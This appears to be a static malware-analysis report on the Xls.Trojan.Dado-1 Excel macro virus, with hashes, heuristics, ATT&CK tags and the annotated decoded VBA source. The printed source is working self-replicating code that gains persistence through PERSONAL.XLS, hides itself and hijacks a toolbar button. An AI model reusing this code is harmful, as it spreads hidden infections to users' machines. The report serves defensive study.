Xls.Trojan.Dado-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 1ed80737537cb738…

MALICIOUS

Office (OLE)

32.5 KB Created: 1998-08-05 11:58:47 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: ebf8c261a4de428a6ff172abd383ddff SHA-1: d95e7dd0573442ae0e7ed33de4fc87b6cc6477af SHA-256: 1ed80737537cb7386d9b6ea912e0c9432ea66eb82216a09d2798f71b7c065073
80 Risk Score

Malware Insights

Xls.Trojan.Dado-1 · confidence 90%

MITRE ATT&CK
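T1059.005 Visual Basic · T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription
(Analyst caveat: the visible part of the macro preview contains no WMI calls. The persistence it does show, a PERSONAL.XLS workbook written to the Excel startup path, appears closer to T1137 Office Application Startup, so the T1546.003 tag should be confirmed against the full sample.)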

This Excel file contains VBA macros, identified by the 'OLE_VBA_MACROS' heuristic and the 'Xls.Trojan.Dado-1' ClamAV detection. The 'auto_abrir' subroutine in the extracted 'macros.bas' script (VBA module 'conciente') calls 'infectar', which attempts to infect the user's Excel environment by copying the 'conciente' sheet into 'PERSONAL.XLS' in the Excel startup path, likely to establish persistence. The script also hides the 'conciente' sheet and the 'PERSONAL.XLS' window, and may download further payloads, though no download or network code appears in the visible portion of the preview and the full functionality is truncated.

Heuristics 2

  • ClamAV: Xls.Trojan.Dado-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Dado-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4502 bytes
SHA-256: a71f9ec12b698988087d8bc6f8fa9eb0d0b997a7a956765a50c26b0cc36dd45b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "conciente"


' Analyst note: entry point of the carved "conciente" module. It switches off
' screen redraws and alert prompts, calls infectar, hides the PERSONAL.XLS
' window, and then restores the two UI settings.
' "auto_abrir" is Spanish for "auto_open"; presumably this is the localized
' auto-run macro name that Excel invokes when the workbook is opened --
' confirm against the Excel version/locale the sample targets.
Sub auto_abrir()
Attribute auto_abrir.VB_ProcData.VB_Invoke_Func = " \n14"
' The disabled line below appears to be the Spanish-localized spelling of
' "On Error GoTo terminar1". With it commented out, no error handler is
' installed in this routine.
'Dado Error IrA terminar1
' Suppress redraws and prompts so the copy done by infectar is not shown.
Application.ScreenUpdating = False
Application.DisplayAlerts = False
infectar
' Keep the PERSONAL.XLS workbook window hidden from the user.
Windows("PERSONAL.XLS").Visible = False
Application.ScreenUpdating = True
Application.DisplayAlerts = True
' The four disabled lines below use Spanish-localized object names
' (BarrasMenús = menu bars, Herramientas = Tools, Formato = Format,
' Hoja = Sheet, Mostrar... = Unhide..., Eliminar = Delete). If enabled they
' would apparently delete the Tools > Macro... and Format > Sheet > Unhide...
' menu entries, i.e. the UI a user would use to inspect macros or unhide the
' sheet. They are commented out in this sample.
'BarrasMenús(xlHojaCálculo).Menús("Herramientas").ElementosMenú("Macro...").Eliminar
'BarrasMenús(xlMódulo).Menús("Herramientas").ElementosMenú("Macro...").Eliminar
'BarrasMenús(xlHojaCálculo).Menús("Formato").ElementosMenú("Hoja").ElementosMenú("Mostrar...").Eliminar
'BarrasMenús(xlMódulo).Menús(2).ElementosMenú(11).ElementosMenú(3).Eliminar
' Disabled label that the disabled error handler above would have jumped to.
'terminar1:
End Sub

' Analyst note: saves both the current workbook and PERSONAL.XLS with screen
' updates and alert prompts switched off, so the user sees no save prompt.
' "auto_cerrar" is Spanish for "auto_close"; presumably the localized
' auto-run name invoked when the workbook is closed -- confirm.
Sub auto_cerrar()
Attribute auto_cerrar.VB_ProcData.VB_Invoke_Func = " \n14"
' Disabled line; appears to be the Spanish-localized "On Error GoTo terminar2".
'Dado Error IrA terminar2
Application.ScreenUpdating = False
Application.DisplayAlerts = False
' Persist the workbook this module lives in, then the startup-path copy.
Workbooks(ThisWorkbook.Name).Save
Workbooks("PERSONAL.XLS").Save
Application.ScreenUpdating = True
Application.DisplayAlerts = True
' Disabled label paired with the disabled error handler above.
'terminar2:
End Sub

' Analyst note: replication and persistence routine ("infectar" = "infect").
' When run from any workbook other than PERSONAL.XLS, it makes sure a
' PERSONAL.XLS workbook exists in Application.StartupPath and holds a copy of
' the "conciente" sheet, then points a toolbar button at PERSONAL.XLS!contamina.
' It finally hides the sheet and window, saves PERSONAL.XLS, and on one weekday
' schedules the vv1 message box.
'
' Defender-relevant artefacts visible in this routine:
'   - a PERSONAL.XLS file in the Excel startup path containing a hidden sheet
'     named "conciente";
'   - Toolbars(1).ToolbarButtons(3).OnAction set to "PERSONAL.XLS!contamina".
'
' State variable inst (undeclared, so a Variant): 0 = PERSONAL.XLS not found,
' 1 = found but no "conciente" sheet seen yet, 2 = "conciente" already present.
Sub infectar()
Attribute infectar.VB_ProcData.VB_Invoke_Func = " \n14"
' Disabled line; appears to be the Spanish-localized "On Error GoTo terminar".
'Dado Error IrA terminar
Application.ScreenUpdating = False
Application.DisplayAlerts = False
inst = 0
' Skip the copy logic when this code is already running from PERSONAL.XLS.
If ThisWorkbook.Name <> "PERSONAL.XLS" Then
    ' Single-line If: only the assignment belongs to it. The indented blocks
    ' that follow are NOT nested under this test, despite the indentation.
    If Dir(Application.StartupPath + "\PERSONAL.XLS") = "PERSONAL.XLS" Then inst = 1
        ' Case 0: no PERSONAL.XLS yet. Create one in the startup path and copy
        ' the "conciente" sheet into it, unhiding the sheet only for the copy.
        If inst = 0 Then
            Workbooks(ThisWorkbook.Name).Sheets("conciente").Visible = True
            Workbooks(ThisWorkbook.Name).Sheets("conciente").Select
            Workbooks.Add.SaveAs Filename:=Application.StartupPath + "\PERSONAL.XLS"
            Workbooks(ThisWorkbook.Name).Sheets("conciente").Copy Before:=Workbooks("PERSONAL.XLS").Sheets(1)
            Workbooks(ThisWorkbook.Name).Sheets("conciente").Visible = False
            GoTo cuentaventanas
        End If
        ' Case 1: PERSONAL.XLS exists. Check whether it already carries the sheet.
        If inst = 1 Then
            Windows("PERSONAL.XLS").Visible = True
            ' Observation: the count is read from ActiveWorkbook, while the loop
            ' below indexes the sheets of PERSONAL.XLS.
            numhper = Workbooks(ActiveWorkbook.Name).Sheets.Count
            For i = 1 To numhper
                If Workbooks("PERSONAL.XLS").Sheets(i).Name = "conciente" Then
                    inst = 2
                End If
            Next
            ' Still 1 means no "conciente" sheet was found: copy it in.
            If inst = 1 Then
                Windows(ThisWorkbook.Name).Activate
                Workbooks(ThisWorkbook.Name).Sheets("conciente").Visible = True
                Workbooks(ThisWorkbook.Name).Sheets("conciente").Select
                ' Shows the current workbook name to the user; looks like a
                ' leftover debugging aid -- intent not established by the code.
                MsgBox (ThisWorkbook.Name)
                Workbooks(ThisWorkbook.Name).Sheets("conciente").Copy Before:=Workbooks("PERSONAL.XLS").Sheets(1)
                Workbooks(ThisWorkbook.Name).Sheets("conciente").Visible = False
                GoTo cuentaventanas
            Else
                GoTo cuentaventanas
            End If
        End If
' All branches above converge here.
cuentaventanas:
    ' Rebind the third button of the first toolbar so that clicking it runs
    ' contamina from PERSONAL.XLS.
    Application.Toolbars(1).ToolbarButtons(3).OnAction = "PERSONAL.XLS!contamina"

    End If
    
' Runs on every call, including from PERSONAL.XLS itself: hide the sheet and
' the workbook window, save, and return focus to the current workbook.
Workbooks("PERSONAL.XLS").Sheets("conciente").Visible = False
Windows("PERSONAL.XLS").Visible = False
Workbooks("PERSONAL.XLS").Save
Windows(ThisWorkbook.Name).Activate

Application.ScreenUpdating = True
Application.DisplayAlerts = True
' WeekDay(Now) = 6 is Friday under VBA's default Sunday-first numbering, which
' matches the text shown by vv1. On that day vv1 is scheduled for 16:30.
If WeekDay(Now) = 6 Then
    Application.OnTime TimeValue("16:30:00"), "vv1"
End If
' Disabled label paired with the disabled error handler at the top.
'terminar:
End Sub

' Analyst note: visible payload. Shows a single message box and does nothing
' else. infectar schedules it through Application.OnTime.
' The Spanish text reads roughly: "THANK GOD IT'S FRIDAY!!!" / "PLEASE TURN OFF
' YOUR COMPUTER AND HAVE A GOOD WEEKEND". Chr(13) is the line break between
' the two sentences.
Sub vv1()
Attribute vv1.VB_ProcData.VB_Invoke_Func = " \n14"
MsgBox ("                ¡¡¡ GRACIAS A DIOS ES VIERNES !!! " & Chr(13) & "FAVOR DE APAGAR SU COMPUTADOR Y QUE TENGA UN BUEN FIN DE SEMANA")
End Sub

Sub contamina()
Attribute contamina.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo finish
Application.ScreenUpdating = False
Application.DisplayAlerts = False
    numhojas = ActiveWorkbook.Sheets.Count
    libact = ActiveWorkbook.Name
    For iii = 1 To numhojas
        If ActiveWorkbook.Sheets(iii).Name = "conciente" Then
            inst = 3
        End If
    Next
    If inst <> 3 Then
        Windows("PERSONAL.XLS").Visible = True
        Workbooks("PERSONAL.XLS").Sheets("conciente").Visible = True
        Workbooks(libact).Activate
        Workbooks("PERSONAL.XLS").Sheets("conciente").Copy
... (truncated)